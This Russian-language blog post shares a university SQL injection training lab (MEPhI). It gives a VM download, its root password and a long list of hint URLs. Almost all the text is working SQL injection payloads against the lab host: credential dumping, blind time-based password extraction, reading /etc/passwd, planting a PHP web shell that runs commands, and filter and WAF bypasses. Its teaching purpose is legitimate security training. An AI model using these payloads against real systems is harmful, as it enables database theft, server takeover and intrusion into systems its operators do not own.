Advanced SQL Injection lab (full pack)

Advanced SQL Injection lab (full pack)
По полученным просьбам, выкладываю полные оригиналы всех материалов, которые готовились для МИФИ по теме "Внедрение операторов SQL". Оригинал презентации: name='more'> PT MIFI Labsql
View more presentations from Dmitry Evteev . Раздаточный материал: PT MIFI Labsql
View more documents from Dmitry Evteev . Виртуальную машину, можно забрать отсюда . MD5 0cd5f40393f887aea025ab9b03799b11 *PT_SQL_Injection_MIFI-LAB.rar Технические детали: Для запуска виртуальной машины может использоваться VMWare Player . IP-адрес системы управления - 192.168.0.50 (management). IP-адрес системы для проведения лабораторной работы 192.168.0.51 (target). Пароль на учетную запись "root" в ОС/MySQL "Mifilab1". Подсказки по выполнению лабораторной работы: 1.1 "Внедрение операторов SQL" (SQL INJECTION) http://192.168.0.51/ 'or 1=1-- http://192.168.0.51/action2.php?id=14+OR+1=1-- http://192.168.0.51/action2.php?id=14+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns-- http://192.168.0.51/action2.php?id=14+union+select+concat_ws(0x3a,id,login,password,name)+from+users-- 1.2 "Слепое внедрение операторов SQL" (BLIND SQL INJECTION) http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+limit+0,1)))-- http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+0,1)))-- http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+3,1)))-- http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+4,1)))-- http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,login,password)+from+users1+limit+0,1)))-- http://192.168.0.51:81/actions.php?f=1+and+sleep(10)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),1,1)))='a',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),1,1)))='2',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),2,1)))='b',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),3,1)))='l',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),4,1)))='i',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),5,1)))='n',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),6,1)))='d',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),7,1)))='s',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),8,1)))='q',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),9,1)))='l',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),10,1)))='a',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),11,1)))='d',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),12,1)))='m',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),13,1)))='i',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),14,1)))='n',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),15,1)))=':',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),16,1)))='p',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),17,1)))='a',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),18,1)))='r',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),19,1)))='0',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),20,1)))='l',sleep(10),1)-- 1.3 Работа с файловой системой при эксплуатации уязвимости SQL INJECTION http://192.168.0.51:8080/index.php?fl=5+union+select+load_file('/etc/passwd')-- http://192.168.0.51:8080/index.php?fl=5+union+select+load_file('/')-- http://192.168.0.51:8080/index.php?fl=5+union+select+load_file('/usr/local/www/apache22/data3/tmp/')-- http://192.168.0.51:8080/index.php?fl=5+union+select+'test'+into+dumpfile+'/usr/local/www/apache22/data3/tmp/test.txt'-- 1.4 Выполнение команд на сервере при эксплуатации уязвимости SQL INJECTION http://192.168.0.51:8080/index.php?fl=5+union+select+'<? system($_GET[cmd]); ?>'+into+dumpfile+'/usr/local/www/apache22/data3/shells//test.php'-- http://192.168.0.51:8080/shells/test.php?cmd=ls 1.5 Обход программных фильтров безопасности при эксплуатации уязвимости SQL INJECTION http://192.168.0.51:8585/hex.php http://192.168.0.51:8585/actions.php?d=1/*%00*/or+1=1-- http://192.168.0.51:8585/actions.php?d=1/*%00*/or/**/1=1 http://192.168.0.51:8585/actions.php?d=1/*%00*/uni--on/**/se--lect/**/1 http://192.168.0.51:8585/actions.php?d=1/*%00*/uni--on/**/se--lect/**/concat_ws(0x3a,table_name,column_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61 http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x3a,table_name,column_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61 http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x3a,table_name,column_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61/**/AND/**/table_name/**/not/**/in(0x616374696F6E73) http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x3a,table_name,column_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61/**/limit/**/0,1/**/un--ion/**/sel--ect/**/1 http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x3a,table_name,column_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61/**/limit/**/3,1/**/un--ion/**/sel--ect/**/1 http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x3a,table_name,column_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61/**/limit/**/4,1/**/un--ion/**/sel--ect/**/1 http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x2e,table_schema,table_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61/**/limit/**/2,1/**/un--ion/**/sel--ect/**/1 http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x3a,username,pass)/**/from/**/web4.usersdb/**/limit/**/0,1/**/un--ion/**/sel--ect/**/1 1.6 Обход Web Application Firewall (WAF) при эксплуатации уязвимости SQL INJECTION http://192.168.0.51:9191/index.php?id=-1+union/*&lang=*/select+1,2,3 http://192.168.0.51:9191/index.php?id=-1+union/*&lang=*/select+1,2,table_name+information_schema.columns http://192.168.0.51:9191/index.php?id=-1+union/*&lang=*/select+1,2,3+from+users http://192.168.0.51:9191/index.php?id=-1+union/*&lang=*/select+*+from(select+*+from+users+join+users+b)a http://192.168.0.51:9191/index.php?id=1+union/*&lang=*/select+*+from(select+*+from+users+join+users+b+using(id))a http://192.168.0.51:9191/index.php?id=1+union/*&lang=*/select+*+from(select+*+from+users+join+users+b+using(id,wafusr,pwdwwaff))a http://192.168.0.51:9191/index.php?id=-1+union/*&lang=*/select+wafusr,pwdwwaff,priv+from+users ЗЫ: с учетом метода, приведенного в предыдущем посте , часть 1.6 может выполняться гораздо проще;)
уязвимости waf server-side research SQL-Injection уязвимости web выступления 0day
Alt text

Домашний Wi-Fi – ваша крепость или картонный домик?

Узнайте, как построить неприступную стену